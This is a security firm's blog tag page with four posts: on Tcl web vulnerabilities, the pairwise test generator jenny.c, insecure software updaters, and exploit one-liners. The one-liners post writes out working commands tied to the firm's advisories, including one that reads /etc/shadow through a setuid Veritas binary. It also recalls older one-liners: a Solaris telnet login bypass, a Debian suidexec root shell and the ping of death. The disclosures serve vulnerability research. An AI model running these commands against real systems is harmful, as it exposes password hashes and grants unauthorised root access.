Posts Tagged vulnerabilities

Tickle! See? Gee, I …

A montage of TCL and Tcl-related logos


Ah, TCL, the Tool Command Language. Based on the research conducted by myself and my colleagues here at Security Objectives (most notably Shane Macaulay,) we have concluded that Tcl has a multitude of security issues, especially when being used in a network environment; and contemporarily speaking, network usage is almost unavoidable. In essence, we are urging the use of extreme caution in Tcl-based web development–whether it’s being used directly or indirectly. To generalize, we also advise against using Tcl for any network application or protocol (not just HTTP.) Security Objectives has published an in-depth analysis of practical Tcl vulnerabilities. The whitepaper, entitled “Tickling CGI Problems”, outlines the theoretical backbone of the phenomena in the first half and presents cases of real-world exploitation in the second half. However, the background theory along with some general programming and Hyper-Text Transfer Protocol knowledge is recommended in order to gain a firm understanding of the exploits themselves.

This is not to say that Tcl should not be used ever, so as a disclaimer we are not advocating any programming language over another.  Our position is that the traditional approach to web security with Tcl has much room for improvement. Like any other programming language it works nicely in certain areas such as academic research, scientific computing, extensions, and software testing. With that being said, one project that comes to mind is regfuzz, a regular expression fuzzer written in Tcl which is quite useful. The distinction here is that regfuzz is not intended to be exposed to a public (or even a private) network. Surely, Safe-Tcl could successfully serve network clients in a hardened production environment given that assessed risks were rated low enough to suffice as acceptable. The problem is, that’s not the type of operations that occur in practice as evidenced by an overwhelming majority of cases.

The vulnerabilities exposed by the whitepaper affect TclHttpd, Lyris List Manager, cgi.tcl (which also uses Expect) as well as the Tcl language itself and interpreters thereof. Some of the attack methodologies and vulnerabilities identified are new to the public. Others are similar to well-known attacks or simply subversions of previous security patches, e.g. CVE-2005-4147. As time unfolds, there will surely be a surge in publicized Tcl weaknesses due to the research which is elaborated on within the whitepaper. If you’re interested in discovering vulnerabilities in Tcl software yourself, then there’s a grand list of references to Tcl-related things at There is also a USENET newsgroup dedicated to it which is naturally called comp.lang.tcl.

For those of you attending CanSecWest 2011 in Vancouver, we are sponsoring the event. Professionals from Security Objectives will be in attendance to answer your queries regarding Tcl/Tk security or other areas of specialized research (information assurance, software assurance, cloud security, etc.) Of course, our professionals will also be available to field questions regarding Security Objectives’ product and service offerings as well. In addition, CanSecWest 2011 attendees receive special treatment when purchasing licenses for BlockWatch, the complete solution to total cloud security.

Comments (2)

Jenny’s Got a Perfect Pair of..

binomial coefficients

binomial coefficients

..binomial coefficients?! That’s right. I’ve found the web site of a Mr. Bob Jenkins with an entire page dedicated to a pairwise covering array generator named jenny.c. I’m fairly sure that only the most hardcore of the software testing weenies have some notion of what those are so for the sake of being succinct I’ll be providing my own explanation here: A pairwise covering array generator is a program for silicon computing machines that deduces sequences of input value possibilities for the purposes of software testing; and yes, I did say silicon computers–since testing their software is really a question of the great Mr. Turing’s halting problem, the existence of a practical, affordable, and efficient nano/molecular computing device such as a DNA computer, Feynman machine, universal quantum computer, etc. would essentially predicate a swift solution to the problem of testing contemporary computer software in non-deterministic polynomial time. The only problem we would have then is how to test those fantastic, futuristic, (seemingly science fictive) yet wondrous problem-solving inventions as they break through laborious barriers of algorithmic complexities that twentieth century computer scientists could have only dreamed about: PCP, #P, PSPACE-complete, 2-EXPTIME and beyond.. The stuff that dreams are made of.

Now, let’s return to Earth and learn about a few things that make Jenny so special. Computer scientists learned early on in their studies of software testing that pairwise or test cases with two input values were the most likely to uncover erroneous programming or “bugs.” Forget the luxury of automation for a minute, old school programmers typed input pairs manually to test their own software. Code tested in that manner was most likely some sort of special-purpose console mode utility. (Celsius to Fahrenheit, anyone?) As the computing power of the desktop PC increased according to Moore’s law, it became time-effective to write a simple program to generate these input pairs instead of toiling over it yourself–I suppose not testing at all was another option. Today, still some software is released to market after only very minor functional and/or quality assurance testing. Regression, stress, security, and other forms of testing cost money and reduce time to market, but in reality significant return on investment acts as a hedge against any losses incurred. Even ephemeral losses justify the absolute necessity of these expenditures.

A Jenny built in modern times undoubtedly has the power to deductively prove that a software product of the eighties decade is comprised of components (or units) that are fundamentally error-free. However, the paradox remains that improvements in automated software testers share a linear relationship with improvements of software in general. Thus, pairwise has become “n-way” which describes the process of utilizing greater multiples of input values in order to cover acceptable numbers of test cases. The number of covering arrays generated in this fashion grows exponentially and can be calculated as a binomial coefficient (see formula below.)

(n choose r) in factorial terms

(n choose r) in factorial terms

According to Paul Black, former SAMATE (Software Assurance Metrics and Tool Evaluation) project leader, researchers at NIST have pegged 6-way as the magic number for optimal fault interaction coverage (notably Rick Kuhn and Dolores Wallace.) This conclusion is based on hard evidence from studies on real-world software scenarios including medical devices and the aerospace industry. However, it would not surprise me to see this approximation rise significantly in the coming decades, just as the paradoxical relationship between general-purpose software and automated software testing programs shifts itself in accordance with Moore’s law. If not by Moore, then by some other axiom of metric progression such as Rogers’ bell curve of technological adoption.

I’ve also got a hunch that the tiny percentage of bugs in that “n is arbitrarily greater than 6” range are some of the most critical, powerfully impacting software vulnerabilities known to man. They lie on an attack surface that’s almost non-existent; this makes them by definition, obscure, non-obvious, shadowy, and hidden. Vulnerabilities in this category are the most important by their very nature. Therefore, detecting vulnerabilities of this type will involve people and tools that are masters of marksmanship and artistic in their innovation. Research in this area is entering a steadfast beginning especially within the realms of dynamic instrumentation or binary steering, active analysis, fault propagation, higher-order preconditions/dependencies, concurrency issues, race conditions, etc. I believe that combining merits inherent in various analysis techniques will lead to perfection in software testing.

For perfection in hashing, check out GNU’s gperf, read how Bob used a perfect hashing technique to augment Jenny’s n-tuples; then get ready for our Big ßeta release of the BlockWatch client software (just in time for the holiday season!)

Leave a Comment

Exploit One-Liners

Very Small Shell Scripts

Every once in a while there are security vulnerabilities publicized that can be exploited with a single command. This week, Security Objectives published advisories for two such vulnerabilities (SECOBJADV-2008-04 and SECOBJADV-2008-05) which I’ll be describing here. I’ll also be revisiting some one-line exploits from security’s past for nostalgia’s sake and because history tends to repeat itself.

Both issues that were discovered are related to Symantec’s Veritas Storage Foundation Suite. They rely on the default set-uid root bits being set on the affected binaries. Before Symantec and Veritas combined, Sun package manager prompted the administrator with an option of removing the set-id bits. The new Symantec installer just went ahead and set the bits without asking (how rude!)

On to the good stuff.. The first weakness is an uninitialized memory disclosure vulnerability. It can be leveraged like so:

/opt/VRTS/bin/qiomkfile -s 65536 -h 4096 foo

Now, the contents of file .foo (note that it is a dot-file) will contain uninitialized memory from previous file system operations–usually from other users. Sensitive information can be harvested by varying the values to the -s and -h flags over a period of time.

This next one is a bit more critical in terms of privilege escalation. It is somewhat similar to the Solaris srsexec hole from last year. Basically, you can provide any file’s pathname on the command line and have it displayed on stderr. As part of the shell command, I’ve redirected standard error back to standard output.

/opt/VRTSvxfs/sbin/qioadmin -p /etc/shadow / 2>&1

Some of these one-liner exploits can be more useful than exploits that utilize shellcode. Kingcope’s Solaris in.telnetd exploit is a beautiful example of that. The really interesting thing about that one was its resurrection–it originally became well-known back in 1994. In 2007, Kingcope’s version won the Pwnie award for best server-side bug.

telnet -l -fusername hostname

Let’s not forget other timeless classics such as the cgi-bin/phf bug, also from the mid-nineties:


..and Debian’s suidexec hole from the late nineties:

/usr/bin/suidexec /bin/sh /path/to/script

I’m not including exploits that have pipes/semi-colons/backticks/etc. in the command-line because that’s really more than one command being executed. Since the “Ping of Death” is a single command from a commonly installed system utility I’ll be including it here as well. I consider it a true denial of service attack since it does not rely on bandwidth exhaustion:

ping -s70000 -c1 host


Comments (15)

Updating the Updater

Professor John Frink Updates

Attacks against security components have been fairly common on server operating systems for decades; on PC’s this wasn’t always necessary because of security models that resembled swiss cheese. Since the beginning of the 21st century, Microsoft has been working diligently to close obvious holes (for the most part.) As a result, researchers have shifted their focus to the attack surface of security-centric code on PC’s. Case in point; in the past several years we’ve seen loads of advisories released for vulnerabilities in anti-virus software. Read the Yankee Group’s “Fear and Loathing in Las Vegas: The Hackers Turn Pro” for a more in-depth analysis of this trend. One area in particular where I feel PC protection is lacking is automated software security update mechanisms; there is a lot of room for improvement.

According to Hewlett-Packard, Digital Equipment Corporation was the first in the industry to perform patch delivery in 1983. Prior to this, updates were commonly delivered on tape by private courier. At one of 2600’s HOPE conferences, Kevin Mitnick spoke about an analog attack he had used to compromise this process during the social engineering panel. The gist of it was that he wore a UPS uniform (procured from a costume store) and delivered the “update” tape to his mark with a login trojan on it. Later, Mitnick became known for using SYN floods and TCP hijacking against Tsutomo Shimomura. Some sources even refer to this sort of digital man-in-the-middle as “The Mitnick Attack.”

Many software update components don’t use public key infrastructure to cryptographically verify the validity of the update server (i.e. SSL) or the updated package (i.e. digital signature.) This is a problem. Impersonating the software update server is usually trivial. Wi-Fi access point impersonation, DNS cache poisoning, ARP spoofing, session hijacking, and compromising the legitimate update server are all possibilities.

Some applications–I’m not going to name any names–rely on HTTP (note that I didn’t say HTTPS) for downloading packages after checking for updates instead of using a separate file transfer manager program or internal update component. This is much easier to reverse engineer than a custom update solution. Sometimes the attacker can allow the real update server to carry out most of the process and simply shoehorn their malcode into the update session(s) after initial preconditions are met.

SSL won’t save the day either unless it’s implemented properly. I’ve seen plaintext updaters with digital signatures that are safer than some HTTPS updaters. Gentoo’s Portage Tree (emerge and ebuild) is a good example of an effective plaintext digital signature approach. See SECOBJADV-2008-01 (CVE-2008-3249) for a description of a software updater with an erroneous SSL implementation.

The issue is further complicated because software updaters themselves need to be updated in order to resolve such vulnerabilities. Typically this requires a major architectural modification. What’s worse is that breaking the updater would force users to manually update. Hoyvin-Glayvin!

Comments (2)

%d bloggers like this: